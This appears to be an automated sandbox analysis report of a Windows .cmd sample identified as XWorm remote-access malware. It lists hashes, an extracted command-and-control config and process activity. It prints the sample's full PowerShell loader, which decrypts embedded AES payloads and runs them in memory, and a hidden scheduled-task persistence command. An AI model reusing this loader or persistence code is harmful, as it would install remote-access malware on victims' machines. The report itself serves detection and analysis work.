Analysis
-
max time kernel
5s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system -
submitted
01-07-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
Resource
win7-20240419-en
General
-
Target
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
-
Size
500KB
-
MD5
6e45850d43bde1d6bc68ab6b07daf153
-
SHA1
427ed64bb89e6bf40e59276768d37152c209e976
-
SHA256
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150
-
SHA512
e44ea25026d2146991e61eb82ed6028af248fb9235b271f665943b432833e3274a3e9ae9ffc912436b294e6a450337cbd251daafad11c926a41cc942042b4f81
-
SSDEEP
12288:Co8xbtgA4f9Ek3aoC4QvfD2ZK1n6B4XyZYi9lGUnnQ:Co8NtsaCm1nhqD9ginQ
Malware Config
Extracted
xworm
5.0
korkos.now-dns.net:999
PloDJK2PhSuWy8rU
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource: behavioral2/memory/4372-67-0x0000020345DD0000-0x0000020345DE2000-memory.dmp; yara_rule: family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exe — pid: 2216, process: powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exe — description: Token: SeDebugPrivilege, pid: 2216, process: powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exe — description | pid | process | target process
PID 568 wrote to memory of 3236 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3236 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 4936 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 4936 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 5024 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 5024 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3296 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3296 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 4028 | 568 | cmd.exe | Conhost.exe
PID 568 wrote to memory of 4028 | 568 | cmd.exe | Conhost.exe
PID 568 wrote to memory of 984 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 984 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3084 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3084 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3228 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3228 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 5052 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 5052 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3840 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 3840 | 568 | cmd.exe | cmd.exe
PID 568 wrote to memory of 2216 | 568 | cmd.exe | powershell.exe
PID 568 wrote to memory of 2216 | 568 | cmd.exe | powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var 
$null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd" "3⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var 
$null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150')5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB
MD5 50c591ec2a1e49297738ea9f28e3ad23
SHA1 137e36b4c7c40900138a6bcf8cf5a3cce4d142af
SHA256 7648d785bda8cef95176c70711418cf3f18e065f7710f2ef467884b4887d8447
SHA512 33b5fa32501855c2617a822a4e1a2c9b71f2cf27e1b896cf6e5a28473cfd5e6d126840ca1aa1f59ef32b0d0a82a2a95c94a9cc8b845367b61e65ec70d456deec
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB
MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB
MD5 005bc2ef5a9d890fb2297be6a36f01c2
SHA1 0c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512 f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5 0cbc923c35550088c27d279ef0a02bcc
SHA1 15fc7e957f2643837eb4e0e0a84069a7cba301e3
SHA256 7ad6c691019cbad37cf422666ea4694b8cdac7ed9ecb04005c4dab7d9371b0dc
SHA512 598b587386814562ef2069ea893c2fbafe733801ca33a7fc1a2028b796f80ad4995aa106e032cf2e5069ce0875e5b42167e5b9df3e32c4cad317b8efbed4022b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkwrube0.kyk.ps1
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/384-68-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/524-99-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/904-103-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/956-72-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1096-102-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1340-95-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1364-70-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1468-108-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1480-104-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1488-109-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1552-77-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1660-116-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1724-97-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1752-76-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1948-71-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/1956-69-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2084-100-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2088-107-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2148-73-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2216-13-0x000001961DAB0000-0x000001961DAB8000-memory.dmp
Filesize
32KB
-
memory/2216-17-0x000001961DB30000-0x000001961DB66000-memory.dmp
Filesize
216KB
-
memory/2216-15-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp
Filesize
2.0MB
-
memory/2216-16-0x00007FFA54230000-0x00007FFA542EE000-memory.dmp
Filesize
760KB
-
memory/2216-14-0x000001961DAC0000-0x000001961DAD0000-memory.dmp
Filesize
64KB
-
memory/2216-5-0x000001961D5C0000-0x000001961D5E2000-memory.dmp
Filesize
136KB
-
memory/2216-11-0x000001961DBB0000-0x000001961DC26000-memory.dmp
Filesize
472KB
-
memory/2216-10-0x000001961DAE0000-0x000001961DB24000-memory.dmp
Filesize
272KB
-
memory/2496-96-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2508-115-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2520-98-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/2900-105-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/3336-66-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/3336-56-0x0000000003020000-0x000000000304A000-memory.dmp
Filesize
168KB
-
memory/3508-74-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/4228-106-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB
-
memory/4372-33-0x00007FFA54230000-0x00007FFA542EE000-memory.dmp
Filesize
760KB
-
memory/4372-67-0x0000020345DD0000-0x0000020345DE2000-memory.dmp
Filesize
72KB
-
memory/4372-32-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp
Filesize
2.0MB
-
memory/4848-101-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp
Filesize
64KB